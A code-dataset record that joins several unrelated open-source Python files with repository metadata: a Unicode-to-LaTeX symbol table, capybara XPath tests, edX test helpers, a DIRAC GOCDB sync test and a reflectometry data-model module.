u"\uD71F":"\\mathbit{\\Delta}",
u"\uD720":"\\mathbit{\\Epsilon}",
u"\uD721":"\\mathbit{\\Zeta}",
u"\uD722":"\\mathbit{\\Eta}",
u"\uD723":"\\mathbit{\\Theta}",
u"\uD724":"\\mathbit{\\Iota}",
u"\uD725":"\\mathbit{\\Kappa}",
u"\uD726":"\\mathbit{\\Lambda}",
u"\uD729":"\\mathbit{\\Xi}",
u"\uD72B":"\\mathbit{\\Pi}",
u"\uD72C":"\\mathbit{\\Rho}",
u"\uD72D":"\\mathbit{O}",
u"\uD72E":"\\mathbit{\\Sigma}",
u"\uD72F":"\\mathbit{\\Tau}",
u"\uD730":"\\mathbit{\\Upsilon}",
u"\uD731":"\\mathbit{\\Phi}",
u"\uD732":"\\mathbit{\\Chi}",
u"\uD733":"\\mathbit{\\Psi}",
u"\uD734":"\\mathbit{\\Omega}",
u"\uD735":"\\mathbit{\\nabla}",
u"\uD736":"\\mathbit{\\Alpha}",
u"\uD737":"\\mathbit{\\Beta}",
u"\uD738":"\\mathbit{\\Gamma}",
u"\uD739":"\\mathbit{\\Delta}",
u"\uD73A":"\\mathbit{\\Epsilon}",
u"\uD73B":"\\mathbit{\\Zeta}",
u"\uD73C":"\\mathbit{\\Eta}",
u"\uD73D":"\\mathbit{\\Theta}",
u"\uD73E":"\\mathbit{\\Iota}",
u"\uD73F":"\\mathbit{\\Kappa}",
u"\uD740":"\\mathbit{\\Lambda}",
u"\uD743":"\\mathbit{\\Xi}",
u"\uD745":"\\mathbit{\\Pi}",
u"\uD746":"\\mathbit{\\Rho}",
u"\uD747":"\\mathbit{\\varsigma}",
u"\uD748":"\\mathbit{\\Sigma}",
u"\uD749":"\\mathbit{\\Tau}",
u"\uD74A":"\\mathbit{\\Upsilon}",
u"\uD74B":"\\mathbit{\\Phi}",
u"\uD74C":"\\mathbit{\\Chi}",
u"\uD74D":"\\mathbit{\\Psi}",
u"\uD74E":"\\mathbit{\\Omega}",
u"\uD74F":"\\partial",
u"\uD750":"\\in",
u"\uD751":"\\mathbit{\\vartheta}",
u"\uD752":"\\mathbit{\\varkappa}",
u"\uD753":"\\mathbit{\\phi}",
u"\uD754":"\\mathbit{\\varrho}",
u"\uD755":"\\mathbit{\\varpi}",
u"\uD756":"\\mathsfbf{\\Alpha}",
u"\uD757":"\\mathsfbf{\\Beta}",
u"\uD758":"\\mathsfbf{\\Gamma}",
u"\uD759":"\\mathsfbf{\\Delta}",
u"\uD75A":"\\mathsfbf{\\Epsilon}",
u"\uD75B":"\\mathsfbf{\\Zeta}",
u"\uD75C":"\\mathsfbf{\\Eta}",
u"\uD75D":"\\mathsfbf{\\Theta}",
u"\uD75E":"\\mathsfbf{\\Iota}",
u"\uD75F":"\\mathsfbf{\\Kappa}",
u"\uD760":"\\mathsfbf{\\Lambda}",
u"\uD763":"\\mathsfbf{\\Xi}",
u"\uD765":"\\mathsfbf{\\Pi}",
u"\uD766":"\\mathsfbf{\\Rho}",
u"\uD767":"\\mathsfbf{\\vartheta}",
u"\uD768":"\\mathsfbf{\\Sigma}",
u"\uD769":"\\mathsfbf{\\Tau}",
u"\uD76A":"\\mathsfbf{\\Upsilon}",
u"\uD76B":"\\mathsfbf{\\Phi}",
u"\uD76C":"\\mathsfbf{\\Chi}",
u"\uD76D":"\\mathsfbf{\\Psi}",
u"\uD76E":"\\mathsfbf{\\Omega}",
u"\uD76F":"\\mathsfbf{\\nabla}",
u"\uD770":"\\mathsfbf{\\Alpha}",
u"\uD771":"\\mathsfbf{\\Beta}",
u"\uD772":"\\mathsfbf{\\Gamma}",
u"\uD773":"\\mathsfbf{\\Delta}",
u"\uD774":"\\mathsfbf{\\Epsilon}",
u"\uD775":"\\mathsfbf{\\Zeta}",
u"\uD776":"\\mathsfbf{\\Eta}",
u"\uD777":"\\mathsfbf{\\Theta}",
u"\uD778":"\\mathsfbf{\\Iota}",
u"\uD779":"\\mathsfbf{\\Kappa}",
u"\uD77A":"\\mathsfbf{\\Lambda}",
u"\uD77D":"\\mathsfbf{\\Xi}",
u"\uD77F":"\\mathsfbf{\\Pi}",
u"\uD780":"\\mathsfbf{\\Rho}",
u"\uD781":"\\mathsfbf{\\varsigma}",
u"\uD782":"\\mathsfbf{\\Sigma}",
u"\uD783":"\\mathsfbf{\\Tau}",
u"\uD784":"\\mathsfbf{\\Upsilon}",
u"\uD785":"\\mathsfbf{\\Phi}",
u"\uD786":"\\mathsfbf{\\Chi}",
u"\uD787":"\\mathsfbf{\\Psi}",
u"\uD788":"\\mathsfbf{\\Omega}",
u"\uD789":"\\partial",
u"\uD78A":"\\in",
u"\uD78B":"\\mathsfbf{\\vartheta}",
u"\uD78C":"\\mathsfbf{\\varkappa}",
u"\uD78D":"\\mathsfbf{\\phi}",
u"\uD78E":"\\mathsfbf{\\varrho}",
u"\uD78F":"\\mathsfbf{\\varpi}",
u"\uD790":"\\mathsfbfsl{\\Alpha}",
u"\uD791":"\\mathsfbfsl{\\Beta}",
u"\uD792":"\\mathsfbfsl{\\Gamma}",
u"\uD793":"\\mathsfbfsl{\\Delta}",
u"\uD794":"\\mathsfbfsl{\\Epsilon}",
u"\uD795":"\\mathsfbfsl{\\Zeta}",
u"\uD796":"\\mathsfbfsl{\\Eta}",
u"\uD797":"\\mathsfbfsl{\\vartheta}",
u"\uD798":"\\mathsfbfsl{\\Iota}",
u"\uD799":"\\mathsfbfsl{\\Kappa}",
u"\uD79A":"\\mathsfbfsl{\\Lambda}",
u"\uD79D":"\\mathsfbfsl{\\Xi}",
u"\uD79F":"\\mathsfbfsl{\\Pi}",
u"\uD7A0":"\\mathsfbfsl{\\Rho}",
u"\uD7A1":"\\mathsfbfsl{\\vartheta}",
u"\uD7A2":"\\mathsfbfsl{\\Sigma}",
u"\uD7A3":"\\mathsfbfsl{\\Tau}",
u"\uD7A4":"\\mathsfbfsl{\\Upsilon}",
u"\uD7A5":"\\mathsfbfsl{\\Phi}",
u"\uD7A6":"\\mathsfbfsl{\\Chi}",
u"\uD7A7":"\\mathsfbfsl{\\Psi}",
u"\uD7A8":"\\mathsfbfsl{\\Omega}",
u"\uD7A9":"\\mathsfbfsl{\\nabla}",
u"\uD7AA":"\\mathsfbfsl{\\Alpha}",
u"\uD7AB":"\\mathsfbfsl{\\Beta}",
u"\uD7AC":"\\mathsfbfsl{\\Gamma}",
u"\uD7AD":"\\mathsfbfsl{\\Delta}",
u"\uD7AE":"\\mathsfbfsl{\\Epsilon}",
u"\uD7AF":"\\mathsfbfsl{\\Zeta}",
u"\uD7B0":"\\mathsfbfsl{\\Eta}",
u"\uD7B1":"\\mathsfbfsl{\\vartheta}",
u"\uD7B2":"\\mathsfbfsl{\\Iota}",
u"\uD7B3":"\\mathsfbfsl{\\Kappa}",
u"\uD7B4":"\\mathsfbfsl{\\Lambda}",
u"\uD7B7":"\\mathsfbfsl{\\Xi}",
u"\uD7B9":"\\mathsfbfsl{\\Pi}",
u"\uD7BA":"\\mathsfbfsl{\\Rho}",
u"\uD7BB":"\\mathsfbfsl{\\varsigma}",
u"\uD7BC":"\\mathsfbfsl{\\Sigma}",
u"\uD7BD":"\\mathsfbfsl{\\Tau}",
u"\uD7BE":"\\mathsfbfsl{\\Upsilon}",
u"\uD7BF":"\\mathsfbfsl{\\Phi}",
u"\uD7C0":"\\mathsfbfsl{\\Chi}",
u"\uD7C1":"\\mathsfbfsl{\\Psi}",
u"\uD7C2":"\\mathsfbfsl{\\Omega}",
u"\uD7C3":"\\partial",
u"\uD7C4":"\\in",
u"\uD7C5":"\\mathsfbfsl{\\vartheta}",
u"\uD7C6":"\\mathsfbfsl{\\varkappa}",
u"\uD7C7":"\\mathsfbfsl{\\phi}",
u"\uD7C8":"\\mathsfbfsl{\\varrho}",
u"\uD7C9":"\\mathsfbfsl{\\varpi}",
u"\uD7CE":"\\mathbf{0}",
u"\uD7CF":"\\mathbf{1}",
u"\uD7D0":"\\mathbf{2}",
u"\uD7D1":"\\mathbf{3}",
u"\uD7D2":"\\mathbf{4}",
u"\uD7D3":"\\mathbf{5}",
u"\uD7D4":"\\mathbf{6}",
u"\uD7D5":"\\mathbf{7}",
u"\uD7D6":"\\mathbf{8}",
u"\uD7D7":"\\mathbf{9}",
u"\uD7D8":"\\mathbb{0}",
u"\uD7D9":"\\mathbb{1}",
u"\uD7DA":"\\mathbb{2}",
u"\uD7DB":"\\mathbb{3}",
u"\uD7DC":"\\mathbb{4}",
u"\uD7DD":"\\mathbb{5}",
u"\uD7DE":"\\mathbb{6}",
u"\uD7DF":"\\mathbb{7}",
u"\uD7E0":"\\mathbb{8}",
u"\uD7E1":"\\mathbb{9}",
u"\uD7E2":"\\mathsf{0}",
u"\uD7E3":"\\mathsf{1}",
u"\uD7E4":"\\mathsf{2}",
u"\uD7E5":"\\mathsf{3}",
u"\uD7E6":"\\mathsf{4}",
u"\uD7E7":"\\mathsf{5}",
u"\uD7E8":"\\mathsf{6}",
u"\uD7E9":"\\mathsf{7}",
u"\uD7EA":"\\mathsf{8}",
u"\uD7EB":"\\mathsf{9}",
u"\uD7EC":"\\mathsfbf{0}",
u"\uD7ED":"\\mathsfbf{1}",
u"\uD7EE":"\\mathsfbf{2}",
u"\uD7EF":"\\mathsfbf{3}",
u"\uD7F0":"\\mathsfbf{4}",
u"\uD7F1":"\\mathsfbf{5}",
u"\uD7F2":"\\mathsfbf{6}",
u"\uD7F3":"\\mathsfbf{7}",
u"\uD7F4":"\\mathsfbf{8}",
u"\uD7F5":"\\mathsfbf{9}",
u"\uD7F6":"\\mathtt{0}",
u"\uD7F7":"\\mathtt{1}",
u"\uD7F8":"\\mathtt{2}",
u"\uD7F9":"\\mathtt{3}",
u"\uD7FA":"\\mathtt{4}",
u"\uD7FB":"\\mathtt{5}",
u"\uD7FC":"\\mathtt{6}",
u"\uD7FD":"\\mathtt{7}",
u"\uD7FE":"\\mathtt{8}",
u"\uD7FF":"\\mathtt{9}",
u"\uFB00":"ff",
u"\uFB01":"fi",
u"\uFB02":"fl",
u"\uFB03":"ffi",
u"\uFB04":"ffl",
}
|
jingnanshi/pyTable2LaTeX
|
src/symbols.py
|
Python
|
mit
| 63,240
|
[
"Bowtie"
] |
e95ec77ef60d6145ec3bc617301b862341140254c2e35212371c86976546bef1
|
import pytest
import capybara
class MatchesXPathTestCase:
@pytest.fixture(autouse=True)
def setup_session(self, session):
session.visit("/with_html")
@pytest.fixture
def element(self, session):
return session.find("css", "span", text="42")
class TestMatchesXPath(MatchesXPathTestCase):
def test_is_true_if_the_given_selector_matches_the_element(self, element):
assert element.matches_xpath("//span")
assert element.matches_xpath("//span[@class='number']")
def test_is_false_if_the_given_selector_does_not_match(self, element):
assert not element.matches_xpath("//abbr")
assert not element.matches_xpath("//div")
assert not element.matches_xpath("//span[@class='not_a_number']")
def test_uses_xpath_even_if_default_selector_is_css(self, element):
capybara.default_selector = "css"
assert not element.matches_xpath("//span[@class='not_a_number']")
assert not element.matches_xpath("//div[@class='number']")
class TestNotMatchXPath(MatchesXPathTestCase):
def test_is_false_if_the_given_selector_matches_the_element(self, element):
assert not element.not_match_xpath("//span")
assert not element.not_match_xpath("//span[@class='number']")
def test_is_true_if_the_given_selector_does_not_match(self, element):
assert element.not_match_xpath("//abbr")
assert element.not_match_xpath("//div")
assert element.not_match_xpath("//span[@class='not_a_number']")
def test_uses_xpath_even_if_default_selector_is_css(self, element):
capybara.default_selector = "css"
assert element.not_match_xpath("//span[@class='not_a_number']")
assert element.not_match_xpath("//div[@class='number']")
|
elliterate/capybara.py
|
capybara/tests/session/element/test_matches_xpath.py
|
Python
|
mit
| 1,769
|
[
"VisIt"
] |
bef9d8cf91010e94fd88fa149cd7defb364b0878732bd52195a5e288c3f25593
|
# pylint: disable=C0111
# pylint: disable=W0621
import urllib
from lettuce import world
from django.contrib.auth.models import User, Group
from student.models import CourseEnrollment
from xmodule.modulestore.django import editable_modulestore
from xmodule.contentstore.django import contentstore
@world.absorb
def create_user(uname, password):
# If the user already exists, don't try to create it again
if len(User.objects.filter(username=uname)) > 0:
return
portal_user = world.UserFactory.build(username=uname, email=uname + '@edx.org')
portal_user.set_password(password)
portal_user.save()
registration = world.RegistrationFactory(user=portal_user)
registration.register(portal_user)
registration.activate()
world.UserProfileFactory(user=portal_user)
@world.absorb
def log_in(username='robot', password='test', email='robot@edx.org', name="Robot"):
"""
Use the auto_auth feature to programmatically log the user in
"""
url = '/auto_auth'
params = { 'username': username, 'password': password, 'email': email, 'full_name': name }
url += "?" + urllib.urlencode(params)
world.visit(url)
# Save the user info in the world scenario_dict for use in the tests
user = User.objects.get(username=username)
world.scenario_dict['USER'] = user
@world.absorb
def register_by_course_id(course_id, username='robot', password='test', is_staff=False):
create_user(username, password)
user = User.objects.get(username=username)
# Note: this flag makes the user global staff - that is, an edX employee - not a course staff.
# See courseware.tests.factories for StaffFactory and InstructorFactory.
if is_staff:
user.is_staff = True
user.save()
CourseEnrollment.enroll(user, course_id)
@world.absorb
def enroll_user(user, course_id):
# Activate user
registration = world.RegistrationFactory(user=user)
registration.register(user)
registration.activate()
# Enroll them in the course
CourseEnrollment.enroll(user, course_id)
@world.absorb
def clear_courses():
# Flush and initialize the module store
# Note that if your test module gets in some weird state
# (though it shouldn't), do this manually
# from the bash shell to drop it:
# $ mongo test_xmodule --eval "db.dropDatabase()"
editable_modulestore().collection.drop()
contentstore().fs_files.drop()
|
hkawasaki/kawasaki-aio8-1
|
common/djangoapps/terrain/course_helpers.py
|
Python
|
agpl-3.0
| 2,426
|
[
"VisIt"
] |
8db2f6a6616716981fa1e6b989ad3be4d8ee0d347a3300403e857e3158e3efa2
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# """
# Test_RSS_Command_GOCDBSyncCommand
# """
__RCSID__ = '$Id$'
from datetime import datetime, timedelta
import mock
from DIRAC import gLogger, S_OK
from DIRAC.ResourceStatusSystem.Command.GOCDBSyncCommand import GOCDBSyncCommand
mock_GOCDBClient = mock.MagicMock()
mock_RMClient = mock.MagicMock()
mock_RMClient.addOrModifyDowntimeCache.return_value = S_OK()
"""
Setup
"""
gLogger.setLevel('DEBUG')
def test_instantiate():
""" tests that we can instantiate one object of the tested class
"""
command = GOCDBSyncCommand()
assert command.__class__.__name__ == 'GOCDBSyncCommand'
def test_init():
""" tests that the init method does what it should do
"""
command = GOCDBSyncCommand()
assert command.args == {'onlyCache': False}
assert command.apis == {}
command = GOCDBSyncCommand(clients={'GOCDBClient': mock_GOCDBClient})
assert command.args == {'onlyCache': False}
assert command.apis == {'GOCDBClient': mock_GOCDBClient}
def test_doNew():
""" tests the doNew method
"""
now = datetime.utcnow()
resFromDB = {'OK': True,
'Value': ((now - timedelta(hours=2),
'dummy.host1.dummy',
'https://a1.domain',
now + timedelta(hours=3),
'dummy.host.dummy',
now - timedelta(hours=2),
'maintenance',
'OUTAGE',
now,
'Resource',
'APEL'
),
(now - timedelta(hours=2),
'dummy.host2.dummy',
'https://a2.domain',
now + timedelta(hours=3),
'dummy.host2.dummy',
now - timedelta(hours=2),
'maintenance',
'OUTAGE',
now,
'Resource',
'CREAM'
)
),
'Columns': ['StartDate', 'DowntimeID', 'Link', 'EndDate', 'Name', 'DateEffective', 'Description',
'Severity', 'LastCheckTime', 'Element', 'GOCDBServiceType']}
resFromGOCDBclient = {'OK': True, 'Value':
'''<?xml version="1.0" encoding="UTF-8"?>
<results>
<DOWNTIME ID="dummy.host1.dummy" PRIMARY_KEY="dummy.host1.dummy" CLASSIFICATION="SCHEDULED">
<PRIMARY_KEY>dummy.host1.dummy</PRIMARY_KEY>
<HOSTNAME>dummy.host1.dummy</HOSTNAME>
<SERVICE_TYPE>gLExec</SERVICE_TYPE>
<ENDPOINT>dummy.host1.dummy</ENDPOINT>
<HOSTED_BY>dummy.host1.dummy</HOSTED_BY>
<GOCDB_PORTAL_URL>https://a1.domain</GOCDB_PORTAL_URL>
<AFFECTED_ENDPOINTS/>
<SEVERITY>OUTAGE</SEVERITY>
<DESCRIPTION>Network connectivity problems</DESCRIPTION>
<INSERT_DATE>1473460659</INSERT_DATE>
<START_DATE>1473547200</START_DATE>
<END_DATE>1473677747</END_DATE>
<FORMATED_START_DATE>2016-09-10 22:40</FORMATED_START_DATE>
<FORMATED_END_DATE>2016-09-12 10:55</FORMATED_END_DATE>
</DOWNTIME>
</results>'''}
mock_RMClient.selectDowntimeCache.return_value = resFromDB
mock_GOCDBClient.getHostnameDowntime.return_value = resFromGOCDBclient
command = GOCDBSyncCommand({'ResourceManagementClient': mock_RMClient,
'GOCDBClient': mock_GOCDBClient})
res = command.doNew()
assert res['OK'] is False
|
yujikato/DIRAC
|
src/DIRAC/ResourceStatusSystem/Command/test/Test_RSS_Command_GOCDBSyncCommand.py
|
Python
|
gpl-3.0
| 3,991
|
[
"DIRAC"
] |
0d4b909a64f1724d5846ef775d902ec0511724cd769e7c49e9b9fad3832c12b3
|
# This program is public domain
"""
Reflectometry data representation.
Need to support collections of data from TOF, monochromatic
and white beam instruments.
Conceptually each data point is a tuple::
incident angles (sample tilt and rotation)
reflected angles (polar angle of detector pixel)
slit distances and openings
detector pixel distance and size
incident/reflected polarization
wavelength distribution
measurement start and duration
monitor and detector counts
sample environment
Reflectometers are either vertical or horizontal geometry.
For vertical geometry (sample surface parallel to gravity),
x refers to horizontal slit opening and horizontal detector
pixels. For horizontal geometry (sample surface perpendicular
to gravity) x refers to vertical slit opening and vertical
detector pixels. Other than gravitational corrections to
resolution and detector pixels, the analysis for the two
instrument types should be identical.
Monochromatic reflectometers have a single wavelength per
measurement but scan the measurements. Time-of-flight and
polychromatic reflectometers have multiple wavelengths per
measurement but perform one measurement. In either case
a dataset consists of detector frames versus Q. We will
ignore scans on multichannel instruments since these can
be treated as combined independent scans with non-overlapping
data, and handled outside this data structure.
Data points are gathered together into measurements. Some
files may have multiple measurements, and other measurements
may be spread over multiple files. Files may be local or
remote, ascii or binary. It is up to the individual format
reader to assign map measurements to files.
Different polarization states will be treated as belonging
to different measurements. These will need to be aligned
before polarization correction can be performed. Multiple
measurements may occur on the same detector. In this
case each measurement should have a separate 'region of
interest' to isolate it from the others, presenting a virtual
detector to the reduction and analysis program.
Some information about the measurements may be missing
from the files, or recorded incorrectly. Changes and
additions to the metadata must be recorded in any reduced
data file format, along with a list of transformations
that went into the reduction.
See notes in properties.py regarding dated values.
"""
__all__ = ['ReflData']
import datetime
import weakref
import numpy
from numpy import inf, pi, sin, cos, arcsin, arctan2, sqrt
from qxqz import ABL_to_QxQz
# TODO: attribute documentation and units should be integrated with the
# TODO: definition of the attributes. Value attributes should support
# TODO: unit conversion
class Slit(object):
"""
Define a slit for the instrument. This is needed for correct resolution
calculations and for ab initio footprint calculations.
distance (inf millimetre)
Distance from sample. Positive numbers are after the sample,
negative numbers are before the sample along the beam path.
offset (4 x 0 millimetre)
Offset of the slit blades relative to the distance from the sample.
For vertical geometry, this is left, right, up, down. For horizontal
geometry this is up, down, left, right. Offset + distance gives the
distances of the individual blades from the sample, with negative
numbers occurring before the sample position and positive numbers
after.
shape (shape='rectangular')
Whether we have slit blades ('rectangular') or a circular
aperature ('circular').
x (n x inf millimetre)
Slit opening in the primary direction. For vertical geometry
this is the horizontal opening, for horizontal geometry this is
the vertical opening. This may be a constant (fixed slits) or
of length n for the number of measurements.
y (n x inf millimetre)
Slit opening in the secondary direction. This may be a constant
(fixed slits) or of length n for the number of measurements.
"""
properties = ['distance','offset','x','y','shape']
distance = inf
offset = [0.]*4
x = inf
y = inf
shape = "rectangular" # rectangular or circular
def __init__(self, **kw): _set(self,kw)
def __str__(self): return _str(self)
class Sample(object):
"""
Define the sample geometry. Size and shape areneeded for correct
resolution calculations and for ab initio footprint calculations.
Angles are needed for correct calculation of Q. Rotation and
environment are for display to the user.
description ("")
Sample description, if available from the file.
width (inf millimetre)
Width of the sample in the primary direction. For fixed slits
the footprint of the beam on the sample decreases with angle
in this direction.
length (inf millimetre)
Width of the sample in the secondary direction. The footprint
is independent of angle in this direction.
thickness (inf millimetre)
Thickness of the sample.
substrate_sld (10^-6 Angstrom^-2)
To plot Fresnel reflectivity we need to know the substrate
scattering length density. The default is to assume silicon.
shape ('rectangular')
Shape is 'circular' or 'rectangular'
angle_x (n x 0 degree)
Angle between neutron beam and sample surface in the primary
direction. This may be constant or an array of length n for
the number of measurements.
angle_y (n x 0 degree)
Angle between the neutron beam and sample surface in the
secondary direction. This may be constant or an array of
length n for the number of measurements. This is known as
tilt on some instruments.
rotation (n x 0 degree)
For off-specular reflectivity the orientation of the patterned
array on the surface of the sample affects the computed theory.
This value is not needed for data reduction, but it should be
reported to the user during reduction and carried through to
the reduced file for correct analysis.
environment ({})
Sample environment data. See Environment class for a list of
common environment data.
"""
properties = ['description','width','length','thickness','shape',
'angle_x','angle_y','rotation','substrate_sld']
description = ''
width = inf # mm
length = inf # mm
thickness = inf # mm
shape = 'rectangular' # rectangular or circular or irregular
angle_x = 0 # degree
angle_y = 0 # degree
rotation = 0 # degree
substrate_sld = 2.07 # inv A (silicon substrate for neutrons)
def __init__(self, **kw):
self.environment = {}
_set(self,kw)
def __str__(self): return _str(self)
class Environment(object):
"""
Define sample environment data for the measurements such as
temperature (kelvin)
pressure (pascal)
relative_humidity (%)
electric_field (V/m)
magnetic_field (tesla)
stress_field (pascal)
The data may be a constant, a series of values equal to
the number of scan points, or a series of values and times.
The average, max and min over all scan points, and the
value, max and min for a particular scan point may be
available.
Some measurements are directional, and will have a polar
and azimuthal angle associated with them. This may be
constant for the entire scan, or stored separately with
each magnitude measurement.
name
Name of environment variable
units
Units to report on graphs
average, minimum, maximum
Statistics on all measurements
value
Magnitude of the measurement
start
Start time for log
time (seconds)
Measurement time relative to start
polar_angle (degree)
azimuthal_angle (degree)
Provide orientation relative to the sample surface for
directional parameters:
* x is polar 0, azimuthal 0
* y is polar 90, azimuthal 0
* z is azimuthal 90
"""
pass
class Beamstop(object):
"""
Define the geometry of the beamstop. This is used by the
detector class to compute the shadow of the beamstop on the
detector. The beamstop is assumed to be centered on the
direct beam regardless of the position of the detector.
distance (0 millimetre)
Distance from sample to beamstop. Note: this will need to
be subtracted from the distance from detector to beamstop.
shape ('rectangular')
Shape is 'circular' or 'rectangular'
width (0 millimetre)
Width of the beamstop in the primary direction. For circular
beamstops, this is the diameter.
length (0 millimetre)
Width of the beamstop in the secondary direction. For circular
beamstops, this is the diameter.
offset (2 x millimetre)
Offset of the beamstop from the center of the beam.
ispresent (False)
True if beamstop is present in the experiment.
"""
properties = ['distance','width','length','shape',
'x_offset','y_offset','ispresent']
distance = 0 # mm
width = 0 # mm
length = 0 # mm
shape = 'rectangular' # rectangular or circular
offset = [0,0] # mm
ispresent = False
def __init__(self, **kw): _set(self,kw)
def __str__(self): return _str(self)
class Detector(object):
"""
Define the detector properties. Note that this defines a virtual
detector. The real detector may have e.g., multiple beam paths
incident upon it, and be split into two virtual detectors when
the file is loaded.
Direction x refers to the primary direction, and direction y to
the secondary direction. For vertical geometry, the primary
direction is in the horizontal plane and the secondary direction
is in the vertical plane. For horizontal geometry these are
reversed. This allows the reduction software to be simpler,
but may complicate file loading from formats which store values
in absolute geometry.
Geometry
========
dims (2 x pixels)
Dimensions of the detector, [nx,ny]. For pencil detectors this
should be [1,1]. For position sensitive detectors, this should be
[nx,1]. For area detectors, this should be [nx,ny].
distance (millimetre)
Distance from the sample to the detector.
size (2 x millimetre)
Detector size, [x,y]. Default is 1 mm x 1 mm.
solid_angle (2 x radian)
Detector solid angle [x,y], calculated from distance and size.
center (2 x millimetre)
Location of the center pixel [x,y] relative to the detector arm.
widths_x (nx x millimetre)
widths_y (ny x millimetre)
Pixel widths in x and y. We assume no space between the pixels.
angle_x (n x degree)
angle_y (n x degree)
Angle of the detector arm relative to the main beam in x and y.
This may be constant or an array of length n for the number of
measurements in the scan.
rotation (degree)
Angle of rotation of the detector relative to the beam. This
will affect how vertical integration in the region of interest
is calculated. Ideally the detector would not be rotated, though
misalignment can sometimes occur.
Efficiency
==========
efficiency (nx x ny %)
Efficiency of the individual pixels; this is an array of the same
shape as the detector, giving the relative efficiency of each pixel,
or 1 if the efficiency is unknown.
TODO: do we need variance?
saturation (k [%, counts/second, uncertainty])
Given a measurement of a given number of counts versus expected
number of counts on the detector (e.g., as estimated by scanning
a narrow slit across the detector to measure the beam profile,
then measuring increasingly large portions of the beam profile),
this can be converted to an efficiency correction per count rate
which can be applied to all data read with this detector. The
value for deadtime should be a tuple of three vectors: efficiency,
uncertainty and count rate. Below the lowest count rate the
detector is considered to be 100% efficient (any baseline
inefficiency will be normalized when comparing the measured
reflection to the measured beam). Beyond the highest count
rate, the detector is considered saturated. The uncertainty
is just the sqrt(counts)/time.
Note: Given the nature of the detectors (detecting ionization
caused by neutron capture) there is undoubtably a local
saturation level, but this is likely masked by the usual
detector electronics which can only detect one event at a
time regardless of where it occurs on the detector.
Measurement
===========
wavelength (k nanometre)
Wavelength for each channel
wavelength_resolution (k %)
Wavelength resolution of the beam for each channel using 1-sigma
gaussian approximation dL, expressed as 100*dL/L. The actual
wavelength distribution is considerably more complicated, being
approximately square for multi-sheet monochromators and highly
skewed on TOF machines.
time_of_flight (k+1 millisecond)
Time boundaries for time-of-flight measurement
counts (nx x ny x k counts OR n x nx x ny counts)
nx x ny detector pixels
n number of measurements
k time/wavelength channels
Runtime Facilities
==================
loadcounts (function returning counts)
Counts can be assigned using
data.detector.counts = weakref.ref(counts)
When the counts field is accessed, the reference will be resolved.
If it yields None, then loadcounts will be called and assigned to
counts as a weak reference. In this way large datasets can be
removed from memory when not in active use.
"""
properties=["dims",'distance','size','center','widths_x','widths_y',
'angle_x','angle_y','rotation','efficiency','saturation',
'wavelength','time_of_flight','counts']
dims = [1,1] # i,j
distance = None # mm
size = [1,1] # mm
center = [0,0] # mm
widths_x = 1 # mm
widths_y = 1 # mm
angle_x = 0 # degree
angle_y = 0 # degree
rotation = 0 # degree
efficiency = 1 # proportion
saturation = inf # counts/sec
wavelength = 1 # angstrom
time_of_flight = None # ms
def _solid_angle(self):
"""Detector solid angle [x,y] (radians)"""
return 2*arctan2(numpy.asarray(self.size)/2.,self.distance)
solid_angle = property(_solid_angle,doc=_solid_angle.__doc__)
# Raw counts are cached in memory and loaded on demand.
# Rebinned and integrated counts for the region of interest
# are stored in memory.
#_pcounts = lambda:None
def loadcounts(self):
"""Load the data"""
raise NotImplementedError,\
"Data format must set detector.counts or detector.loadcounts"
def _pcounts(self):
"""Simulated empty weak reference"""
return None
def _getcounts(self):
counts = self._pcounts()
if counts is None:
counts = self.loadcounts()
self._pcounts = weakref.ref(counts)
return counts
def _setcounts(self, value):
# File formats which are small do not need to use weak references,
# however, for convenience the should use the same interface, which
# is value() rather than value.
if isinstance(value,weakref.ref):
self._pcounts = value
else:
def static(): return value
self._pcounts = static
#self._pcounts = lambda:value
def _delcounts(self):
_pcounts = lambda:None
counts = property(_getcounts,_setcounts,_delcounts)
def __init__(self, **kw): _set(self,kw)
def __str__(self): return _str(self)
class ROI(object):
"""
Detector region of interest.
Defines a rectangular region of interest on the detector which
is used for defining frames. This can be used for example to
split a single detector with both polarization states (via
transmission and reflection off a supermirror) into two virtual
detectors.
xlo, xhi (pixels)
ylo, yhi (pixels)
"""
properties = ['xlo','xhi','ylo','yhi']
xlo = None
xhi = None
ylo = None
yhi = None
def __init__(self, **kw): _set(self,kw)
def __str__(self): return _str(self)
class Monitor(object):
"""
Define the monitor properties.
The monitor is essential to the normalization of reflectometry data.
Reflectometry is the number of neutrons detected divided by the
number of neutrons incident on the sample. To compute this ratio,
the incident and detected neutrons must be normalized to the neutron
rate, either counts per monitor count, counts per second or counts
per unit of source power (e.g., coulombs of protons incident on the
detector, or megawatt hours of reactor power).
counts (n x k counts)
Number of counts measured. For scanning instruments there is
a separate count for each of the n measurements. For TOF
instruments there is a separate count for each of k time
channels. Counts may be absent, in which case normalization
must be by time or by monitor. In some circumstances the
user may generate a counts vector, for example by estimating
the count rate by other means, in order to combine data
measured by time with data measured by monitor when the
monitor values are otherwise unreliable. Variance is assumed
to be the number of counts, after any necessary rebinning.
count_time (n seconds)
Duration of the measurement. For scanning instruments, there is
a separate duration for each measurement. For TOF, this is a
single value equal to the duration of the entire measurement.
source_power (n source_power_units)
The source power for each measurement. For situations when the
monitor cannot be trusted (which can happen from time to time on
some instruments), we can use the number of protons incident on
the target (proton charge) or the energy of the source (reactor
power integrated over the duration of each measurement) as a proxy
for the monitor. So long as the we normalize both the slit
measurement and the reflectivity measurement by the power, this
should give us a reasonable estimate of the reflectivity. If
the information is available, this will be a better proxy for
monitor than measurement duration.
base ('time' | 'counts' | 'power')
The measurement rate basis which should be used to normalize
the data. This is initialized by the file loader, but may
be overridden during reduction.
time_step (seconds)
The count_time timer has a reporting unit, e.g. second, or
millisecond, or in the case of NCNR ICP files, hundredths of
a minute. The measurement uncertainty for the count time
is assumed to be uniform over the time_step, centered on
the reported time, with a gaussian approximation of uncertainty
being sqrt(time_step/12).
start_time (n seconds)
For scanning instruments the start of each measurement relative
to start of the scan. Note that this is not simply sum of the
count times because there may be motor movement between
measurements. The start time is required to align the measurement
values with environment parameters, and for calculation of He3
polarization. For TOF, this should be zero.
distance (metre)
Distance from the sample. This is not used by reduction but
may be of interest to the user.
sampled_fraction ([0,1])
Portion of the neutrons that are sampled by the monitor. If the
monitor is after the second slit, the monitor value can be used to
estimate the the counts on the detector, scaled by the sampled
fraction. Otherwise a full slit scan is required to normalize
the reflectivity. This is the inverse of the detector to monitor
ratio used to normalize data on some instruments.
time_of_flight (k+1 millisecond)
Time boundaries for the time-of-flight measurement
source_power_units ('coulombs' | 'megawatthours')
Units for source power.
source_power_variance (n source_power_units)
